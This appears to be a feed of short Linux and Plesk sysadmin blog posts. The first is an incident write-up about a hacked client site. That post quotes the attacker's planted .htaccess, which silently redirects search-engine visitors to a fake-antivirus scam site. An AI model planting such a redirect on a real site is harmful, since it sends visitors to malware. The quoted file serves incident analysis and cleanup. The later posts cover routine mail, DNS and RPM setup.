March 16th, 2009 — Plesk, Security
Today the website of one of the clients was blacklisted by Google by containing malicious software that downloads and installs without user’s consent. Google displayed “This site may harm your computer” under website in the results page.
Analyzing site’s sources we found obfuscated JavaScript code inserted near body, html tags in .html, .php, .tpl files and a .htaccess file with following content:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]^M
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]^M
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://real-antispyware.info/0/go.php?sid=2 [R,L]Hmm, visitors from search engines were redirected to real-antispyware.info. This website is a scam that shows some JavaScript animation fulling the user with a message that his computer is infected and prompts him to download and install a fake AntiVirus.
Analyzing IP addresses from ftp logs we found connections from Russia and China that altered client’s website. Somehow they got user’s ftp password (it can be done in so many ways: weak password, traffic sniffing, virus, keylogger, trojan, …) and they altered website files.
You can use this simple Ruby script to analyze your ftp logs. By default it is configured for a Plesk server, and it will show suspicious lines (change IGNORE variables to fit your needs). You may need to install rubygems and geoip gem.
#!/usr/bin/ruby
require 'rubygems'
require 'geoip'
require 'zlib'
# hide logs from these countries
# Example: RO US
IGNORE_COUNTRIES = %w{RO US}
# free geoip database is not 100% accurate
# we may need to ignore a few ip addresses
IGNORE_IP = %w{127.0.0.1 127.0.0.2}
files = Dir.glob("/usr/local/psa/var/log/xferlog*")
geoip = GeoIP.new('/var/lib/GeoIP/GeoIP.dat')
def ip2country(geoip, ip)
country = geoip.country(ip)[3]
end
ip_list = []
files.each do |filename|
puts ""
puts "Processing #{filename} ..."
File.open(filename) do |f|
input = f
input = Zlib::GzipReader.new(f) if File.extname(filename) == ".gz"
while line = input.gets do
ip = line.split(/\s+/)[6]
unless ip_list.include? ip
country = ip2country(geoip, ip)
unless IGNORE_COUNTRIES.include? country.upcase or IGNORE_IP.include? ip
puts " [#{country} : #{ip}] => #{line}"
end
ip_list << ip
end
end
end
endSteps that needs to followed:
- Change FTP password
- Upload a clean copy from the backups of the website
- Submit the website in the Webmaster’s Tools for reconsideration
- Audit your company security: computers, firewalls, antiviruses, software, …
You may find useful diagnose tool from the Google (replace example.com with your domain):
http://www.google.com/safebrowsing/diagnostic?site=http://example.com
February 8th, 2009 — Linux, Plesk
SMTP stands for Simple Mail Transfer Protocol, it was designed a long time ago when the Internet was a peaceful place. Today we are facing new challenges, so there should be new solutions.
One of the problem is SPAM messages, spammers are keeping to bombard us everyday with junk mails. We did invented black/white list to protect us from them.
If your clients are connecting from an ip address that’s listed in RBL lists (it’s not uncommon for ISPs that are using dynamic ip addresses) they can’t send messages through your server if you are using RBLs.
Disabling RBLs checks it’s not an option, we’ll configure an alternative port for relaying on port 1025 for the clients listed in RBLs.
You can just copy your smtp_psa file and customize it:
cd /etc/xinetd.d/
cp smtp_psa smtp_alt_psa
vim smtp_alt_psa
You need to change service name from smtp to smtp-alt and remove rblsmptd command and it’s -r parameters, finally it should something like this:
# /etc/xinetd.d/smtp_alt_psa
service smtp-alt
{
socket_type = stream
protocol = tcp
wait = no
disable = no
user = root
instances = UNLIMITED
server = /var/qmail/bin/tcp-env
server_args = -Rt0 /var/qmail/bin/relaylock /var/qmail/bin/qmail-smtpd /var/qmail/bin/smtp_auth /var/qmail/bin/true /var/qmail/bin/cmd5checkpw /var/qmail/bin/true
}Append the new service to /etc/services:
smtp-alt 1025/tcp
smtp-alt 1025/udp
And restart the xinetd service:
[root@sirius xinetd.d]# /etc/init.d/xinetd restart
Stopping xinetd: [ OK ]
Starting xinetd: [ OK ]
Verify your configuration with telnet command:
[root@sirius xinetd.d]# telnet localhost 1025
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
220 sirius.example.net ESMTP
# Ctr+] and quit to exit telnet
Now, instruct your clients to change port in SMTP settings from 25 to 1025, they will be able to send mails through your server even you are using RBL lists.
January 16th, 2009 — Linux
FreeImage is not yet available as RPM on CentOS/RHEL, so we’ll create one.
Before installing required libraries by FreeImage, configure yum to use Dag’s repositories, see this post how it can be done.
Learn how to setup your account to build RPMS as non-privileged user:
http://www.cherpec.com/2009/01/build-rpms-as-simple-user/
[root@lynx ~] yum install libjpeg-devel libpng-devel libtiff-devel libmng-devel openexr-devel zlib-devel
[...]
Next, download the following files from FreeImage’s website and put them in your SOURCES directory:
And download freeimage.spec and place it in the SPECS directory.
Now, you are ready to build FreeImage, switch to SPECS directory and build FreeImage package:
[joe@lynx SPECS]$ rpmbuild -ba freeimage.spec
[...]
+ umask 022
+ cd /home/joe/rpmbuild/BUILD
+ cd FreeImage
+ DOCDIR=/home/joe/rpmbuild/tmp/freeimage-3.11.0-buildroot/usr/share/doc/freeimage-3.11.0
+ export DOCDIR
+ rm -rf /home/joe/rpmbuild/tmp/freeimage-3.11.0-buildroot/usr/share/doc/freeimage-3.11.0
+ /bin/mkdir -p /home/joe/rpmbuild/tmp/freeimage-3.11.0-buildroot/usr/share/doc/freeimage-3.11.0
+ cp -pr FreeImage3110.pdf /home/joe/rpmbuild/tmp/freeimage-3.11.0-buildroot/usr/share/doc/freeimage-3.11.0
+ exit 0
Provides: libfreeimage.so.3()(64bit)
Requires(rpmlib): rpmlib(CompressedFileNames) <= 3.0.4-1 rpmlib(PayloadFilesHavePrefix) <= 4.0-1
Requires: libc.so.6()(64bit) libc.so.6(GLIBC_2.2.5)(64bit) libc.so.6(GLIBC_2.3)(64bit) libgcc_s.so.1()(64bit) libgcc_s.so.1(GCC_3.0)(64bit) libstdc++.so.6()(64bit) libstdc++.so.
Processing files: freeimage-debuginfo-3.11.0-1
Checking for unpackaged file(s): /usr/lib/rpm/check-files /home/joe/rpmbuild/tmp/freeimage-3.11.0-buildroot
Wrote: /home/joe/rpmbuild/SRPMS/freeimage-3.11.0-1.src.rpm
Wrote: /home/joe/rpmbuild/RPMS/x86_64/freeimage-3.11.0-1.x86_64.rpm
Wrote: /home/joe/rpmbuild/RPMS/x86_64/freeimage-debuginfo-3.11.0-1.x86_64.rpm
January 16th, 2009 — Linux
It’s not recommended to build your RPMS as root. You can build them as simple user, to accomplish this, you need to create a file called .rpmmacros in your home directory (we’ll assume that your user name is joe and your home directory is /home/joe):
# ~/.rpmmacros
%_topdir /home/joe/rpmbuild
%_tmppath %{_topdir}/tmpThen create required directories:
[joe@lynx ~]$ mkdir -p ~/rpmbuild/{BUILD,RPMS/{noarch,i386,i586,i686,x86_64},SOURCES,SPECS,SRPMS,tmp}You are ready to build your RPMS as simple user.
January 4th, 2009 — Linux, Plesk
Sometimes you need to rebuild all your httpd.include files, it can be done with websrvmng command:
/usr/local/psa/admin/bin/websrvmng -av
December 23rd, 2008 — Linux, Shell
Rename it’s handy command from util-linux package when you need to rename multiple files. From the manual:
NAME
rename - Rename files
SYNOPSIS
rename from to file...
DESCRIPTION
rename will rename the specified files
by replacing the first occurrence of
from in their name by to.
...
Example usage:
[vitalie@silver london]$ ls -1
DSC00967.JPG
DSC00968.JPG
DSC00969.JPG
DSC00970.JPG
DSC00971.JPG
[vitalie@silver london]$ rename DSC00 london_ *.JPG
[vitalie@silver london]$ ls -1
london_967.JPG
london_968.JPG
london_969.JPG
london_970.JPG
london_971.JPG
December 23rd, 2008 — Linux, Plesk
If your server allows recursive queries it can be exploited by malicious users. It should be restricted only to ip addresses from your local nets.
To accomplish this, edit your /etc/named.conf and specify in “options” section which ACL are allowed to run recursive queries with allow-recursion option:
# /etc/named.conf
acl localnets { 127.0.0.1; 192.168.0.0/24; };
options {
...
allow-recursion { localnets; };
...
};then restart bind server:
[root@red ~]# /etc/init.d/named restart
Stopping named: . [ OK ]
Starting named: [ OK ]
In Plesk it can be done from the Control Panel:
Server->DNS Settings->DNS Preferences->Allow recursion
and choose localhost or localnets.
November 21st, 2008 — Linux
Open your /etc/modprobe.conf file and append:
# Turn off IPv6
alias net-pf-10 off
alias ipv6 off
Then restart your server.
November 17th, 2008 — Linux
Lame server is when a NS record for a domain specifies a server which is not authoritative for that domain.
To keep your logs clean from lame server messages (/var/log/messages):
[...]
Nov 16 15:10:50 srv named[99]: lame server resolving 'abc.com' (in 'abc.com'?): 1.2.3.4#53
Nov 16 15:10:50 srv named[99]: lame server resolving 'abc.com' (in 'abc.com'?): 1.2.3.4#53
Nov 16 15:10:50 srv named[99]: lame server resolving 'abc.com' (in 'abc.com'?): 1.2.3.4#53
Nov 16 15:10:50 srv named[99]: lame server resolving 'abc.com' (in 'abc.com'?): 1.2.3.4#53
Nov 16 19:43:25 srv named[99]: lame server resolving 'abc.com' (in 'abc.com'?): 1.2.3.4#53
Nov 16 19:43:25 srv named[99]: lame server resolving 'abc.com' (in 'abc.com'?): 1.2.3.4#53
[...]
Edit your /etc/named.conf and add:
logging {
category lame-servers { null; };
};Then restart bind daemon.
October 24th, 2008 — Linux, Plesk
To enable AntiVirus for all accounts in Plesk you can use the following script:
#!/bin/bash
mysql -uadmin -p`cat /etc/psa/.psa.shadow` psa<<-EOT
UPDATE mail
SET virusfilter = 'any'
WHERE postbox = 'true' AND virusfilter != 'any'
EOT
You can run it daily from the cron to keep your mailboxes protected.